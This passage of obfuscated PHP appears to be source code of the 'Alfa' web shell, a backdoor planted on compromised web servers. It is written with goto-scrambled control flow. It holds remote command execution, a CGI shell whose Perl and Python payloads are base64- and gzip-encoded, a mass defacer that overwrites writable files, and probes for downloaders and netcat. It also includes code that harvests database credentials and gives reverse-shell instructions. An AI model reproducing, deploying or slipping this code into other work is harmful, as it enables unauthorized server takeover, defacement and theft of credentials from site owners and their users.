(!$this->curl_status) { return false; } goto zJdtf; zJdtf: $process = curl_init($url); goto DxQ4F; wy4Yp: curl_setopt($process, CURLOPT_TIMEOUT, 30); goto pjBxq; Kg3wR: curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); goto RKnF6; GBtDl: curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent); goto Kg3wR; KO6iO: curl_setopt($process, CURLOPT_HEADER, 0); goto GBtDl; RKnF6: curl_setopt($process, CURLOPT_ENCODING, $this->compression); goto wy4Yp; Ufndw: $return = curl_exec($process); goto cfx2o; nHjno: } function error($error) { echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>{$error}</div></center>"; die; } } goto W2kYD; MX59A: function alfaEx($in, $re = false, $cgi = true, $all = false) { goto QczxH; QczxH: $data = _alfa_php_cmd($in, $re); goto Uls1G; MfBOS: return $data; goto F77HU; Uls1G: if (empty($data) && $cgi || $all) { if ($GLOBALS["sys"] == "unix") { if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) { $cmd = _alfa_cgicmd($in); if (!empty($cmd)) { return $cmd; } } } } goto MfBOS; F77HU: } goto ObjKp; wg5vJ: function _alfa_is_dir($dir, $mode = "-d") { goto FzTNo; FzTNo: $check = false; goto K0RAY; K0RAY: $check = @is_dir($dir); goto lvogr; Jqeed: return $check; goto y77cm; lvogr: if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("[ "" . trim($mode) . "" "" . trim(addslashes($dir)) . "" ] && echo "yes" || echo "no""); if ($check == "yes") { return true; } else { return false; } } } goto Jqeed; y77cm: } goto JxZhl; MetfZ: function is_ipv4($ip) { return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : "(Null)"; } goto hg5T3; BO7_9: function alfacgishell() { goto oxanR; FmJ5t: $div = ''; goto aKmpP; jm7FO: echo $div; goto zliHh; zliHh: alfafooter(); goto ccS8h; oxanR: alfahead(); goto FmJ5t; aKmpP: if (!in_array($_POST["alfa1"], array("perl", "py"))) { $div = "</div>"; echo "<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi('perl')">| Perl | </a><a href=javascript:void(0) onclick="runcgi('py');">| Python | </a>"; } goto RoSIY; RoSIY: if (isset($_POST["alfa1"]) && in_array($_POST["alfa1"], array("perl", "py"))) { goto soXt1; sK4Cg: @chdir("cgialfa"); goto MdA2g; cS3Bv: if (__write_file($name, $code)) { @chmod($name, 0755); echo "<iframe src="" . "cgialfa/" . $name . "" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>"; } goto vVS7s; soXt1: @mkdir("cgialfa", 0755); goto sK4Cg; MdA2g: alfacgihtaccess("cgi"); goto LKO0q; xt48Z: if ($_POST["alfa1"] == "perl") { $code = $perl; } else { $code = $py; } goto cS3Bv; MZ2fj: $perl = "#!/usr/bin/perl   -I/usr/local/bandmin" . "\xa" . "use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));"; goto EZX4e; LKO0q: $name = $_POST["alfa1"] . ".alfa"; goto MZ2fj; EZX4e: $py = "#!/usr/bin/python" . "
import zlib, base64
" . "eval(compile(zlib.decompress(base64.b64decode("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")),'<string>','exec'))"; goto xt48Z; vVS7s: } goto jm7FO; ccS8h: } goto ediR0; D1CXD: $check = false; goto txlLW; oBMyV: if (!function_exists("posix_getpwuid") && strpos(@ini_get("disable_functions"), "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto dN901; IBuaD: function create_table($data) { goto ST0O2; w7OHZ: echo "</table>"; goto ltba_; ST0O2: echo "<table border="1">"; goto N1Buo; N1Buo: foreach ($data as $key => $val) { goto Pfqah; Pfqah: $array = array(); goto DnA4T; DnA4T: foreach ($val as $k => $v) { $array[$k] = $v; } goto h2hzK; h2hzK: echo "<tr><td><div class='tbltxt'>" . $array["tdName"] . "</div></td><td><input type='text' id='" . $array["id"] . "' name='" . $array["inputName"] . "' " . ($array["placeholder"] ? "placeholder" : "value") . "='" . $array["inputValue"] . "' size='" . $array["inputSize"] . "' " . ($array["disabled"] ? "disabled" : '') . "></td></tr>"; goto OEAxj; OEAxj: } goto w7OHZ; ltba_: } goto xrWHI; xX0N2: @ini_set("max_execution_time", 0); goto MYoFh; GMkUM: function alfaMassDefacer() { goto Nib2w; h5zrK: alfafooter(); goto VFhAw; Z7IO5: echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit="g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;" method='post'>"; goto orHIJ; fhMfv: AlfaNum(5, 6, 7, 8, 9, 10); goto Z7IO5; bQKIq: $method = $_POST["alfa3"]; goto CUR2Q; Nib2w: alfahead(); goto fhMfv; HY3SF: if ($_POST["alfa4"] == ">>") { if (!empty($dir)) { if (@is_dir($dir)) { if (@is_readable($dir)) { if (@is_file($defpage)) { if ($dh = @opendir($dir)) { goto xzAPc; xzAPc: echo __pre(); goto l_iCC; l_iCC: while (($file = @readdir($dh)) !== false) { if ($file == ".." || $file == ".") { continue; } $newfile = $dir . $file; if ($fCurrent == $newfile) { continue; } if (@is_dir($newfile)) { Alfa_ReadDir($newfile, $method, $defpage); } else { goto wadff; P6T56: Alfa_Rewriter($newfile, $file, $defpage, $method); goto W5lVv; XzqKN: if (!@is_readable($newfile)) { continue; } goto P6T56; wadff: if (!@is_writable($newfile)) { continue; } goto XzqKN; W5lVv: } } goto tBkQe; tBkQe: closedir($dh); goto ldGx4; ldGx4: } else { __alert("<font color="red">Error In OpenDir...</font>"); } } else { __alert("<font color="red">DefPage File NotFound...</font>"); } } else { __alert("<font color="red">Directory is not Readable...</font>"); } } else { __alert("<font color="red">Mass Dir is Invalid Dir...</font>"); } } else { __alert("<font color="red">Dir is Empty...</font>"); } } goto rP0vA; nhxHK: $dir = $_POST["alfa1"]; goto Dyccr; rP0vA: echo "</div>"; goto h5zrK; Dyccr: $defpage = $_POST["alfa2"]; goto bQKIq; orHIJ: echo "<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
\x9Mass dir: <input size="50" id="target" type="text" name="massdir" value="" . htmlspecialchars($GLOBALS["cwd"]) . "">\xd
	DefPage: <input size="50" type="text" name="defpage" value="" . htmlspecialchars($GLOBALS["cwd"]) . ""></div> <input type="submit" name="btn" value=" "></center></p>
</form>"; goto nhxHK; CUR2Q: $fCurrent = $GLOBALS["__file_path"]; goto HY3SF; VFhAw: } goto C9S2d; oBxdb: function alfahead() { goto AUYBh; tubBk: define("ALFA_TEMPDIR", function_exists("sys_get_temp_dir") ? @is_writable(str_replace("\", "/", sys_get_temp_dir())) ? sys_get_temp_dir() : (@is_writable(".") ? "." : false) : false); goto gxLGX; gxLGX: if (!isset($_POST["ajax"])) { goto Oltzl; i1TdX: foreach (range("a", "z") as $drive) { if (@is_dir($drive . ":\")) { $drives .= "<a href="javascript:void(0);" class="header_drive" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } goto dg1Ne; zsiHA: if ($GLOBALS["sys"] == "unix") { $useful_downloader = "<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>"; if (!@ini_get("safe_mode")) { if (strlen(alfaEx("id", false, false)) > 0) { goto Gzrhl; JRBae: if ($x == 0) { echo "<span class='header_values' id='header_useful'>--------------</span>"; $GLOBALS["need_to_update_header"] = "true"; } goto nqi7J; B36BV: $x = 0; goto rFpCn; hQCIs: $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzialfa2", "nc", "locate", "suidperl"); goto yGFZ5; dVHrN: foreach ($userful as $item) { if (alfaWhich($item)) { $x++; echo "<span class="header_values" style="margin-left: 4px;">" . $item . "</span>"; } } goto JRBae; tF71K: echo "</td>\xd\xa</tr>"; goto R1tvF; rFpCn: foreach ($downloaders as $item2) { if (alfaWhich($item2)) { $x++; echo "<span class="header_values" style="margin-left: 4px;">" . $item2 . "</span>"; } } goto L5BH8; aeGIT: $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); goto B36BV; nqi7J: echo "</td>\xd\xa</tr>
\xa<tr>
\xa<td height="0" colspan="2"><span class="header_vars">Downloader: </span>"; goto aeGIT; L5BH8: if ($x == 0) { echo "<span class='header_values' id='header_downloader'>--------------</span>"; $GLOBALS["need_to_update_header"] = "true"; } goto tF71K; Gzrhl: echo "<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>"; goto hQCIs; yGFZ5: $x = 0; goto dVHrN; R1tvF: } else { echo $useful_downloader; $GLOBALS["need_to_update_header"] = "true"; } } else { echo $useful_downloader; $GLOBALS["need_to_update_header"] = "true"; } } else { goto JcFmg; vDFZH: echo alfaEx("ver", false, false); goto JLZtd; JcFmg: echo "<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>"; goto vDFZH; JLZtd: echo "</td>
\xa</tr> <tr>
<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
</tr></b>"; goto PlIg1; PlIg1: } goto rs9SO; DzW9c: $drives = ''; goto i1TdX; ARL2M: $path = explode("/", $GLOBALS["cwd"]); goto xqKge; byoId: if (@ini_get("safe_mode")) { $safe_modes = "<span class='header_off'>ON</span>"; } else { $safe_modes = "<span class='header_on'>OFF</span>"; } goto jjji_; luJsI: echo "function fc(a){alfaloader("block");var b="a="+alfab64("FilesMan")+"&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax="+alfab64("true")+"&",c="";for(i=0;i<d.files.elements.length;i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");_Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";islinux&&(b="<a class=\"header_pwd\" onclick=\"g('FilesMan','/');\" href='javascript:void(0);'>/</a>",c="/");var e=a.split("/"),f="",g="";"-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));for(i in e)""!=e[i]&&(f+="<a onclick=\"g('FilesMan','"+g+e[i]+"/');\" href='javascript:void(0);' class=\"header_pwd\">"+e[i]+"/</a>",g+=e[i]+"/");$("header_cwd").innerHTML=b+f+" ";var e=c+e.join("/");e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");newElement.innerHTML=html;for(var scripts=newElement.getElementsByTagName("script"),i=0;i<scripts.length;++i){var script=scripts[i];eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");a.submit.disabled=true;var av = a.a.value,cv = a.c.value,alv = a.alfa1.value,cha = a.charset.value;var b=!1;if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a="+alfab64("FilesMan")+"&c="+a.c.value+"&ajax="+alfab64("true")),c.style.display="none",a.a.value=av,a.c.value=cv,a.alfa1.value=alv,a.charset.value=cha):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";upcount;){var f=$("pfooterup_"+upcount);f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none"),a.submit.disabled=false},b.onerror=function(a){};var e=new FormData(a);b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML='<center><br /><img id="alfaloader" src="" . __showicon("loader") . ""></img><br /><br /></center>'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;i<=10;i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";if(data+="&ajax="+alfab64("true"),"FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");return dl.a.value=alfab64("dlfile"),dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfaloader(a){$("a_loader").style.display=a}function fsu(a){alfaloader("block");for(var b={},c=0;c<a.elements.length;c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64("update")+"&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);break;case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);break;case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));break;case"3":alfa1="loadfile",alfa2=alfab64(e);break;case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");var obj={},id=$("dumpfile");for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a="+alfab64("Sql")+"&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");"bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function is(){for(i=0;i<d.sf.elements["tbl[]"].length;++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");e.innerHTML='<label class="inputfile" for="'+a+'"><span id="__fnameup'+upcount+'"></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id="'+a+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');">',e.id=b,e.appendAfter($(c)),upcount++}function 